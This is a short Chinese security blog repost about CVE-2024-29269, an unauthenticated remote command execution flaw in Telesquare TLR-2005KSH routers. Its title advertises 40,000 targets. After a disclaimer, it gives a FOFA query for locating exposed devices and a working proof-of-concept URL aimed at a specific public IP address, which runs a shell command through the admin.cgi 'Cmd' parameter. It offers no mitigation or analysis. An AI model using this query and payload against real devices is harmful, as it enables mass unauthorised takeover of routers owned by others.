分享

【最新漏洞|附4W 目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

 冲天香阵 2024-05-26 发布于甘肃
PART.01
免责声明

道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PART.02
漏洞描述

Telesquare TLR-2005KSH 未授权远程命令执行漏洞

PART.03
fofa搜索语句

app='TELESQUARE-TLR-2005KSH'

PART.04
影响版本

Telesquare TLR-2005KSH

PART.05
漏洞复现

图片

POC:

http://27.174.74.70:8087/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

图片

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多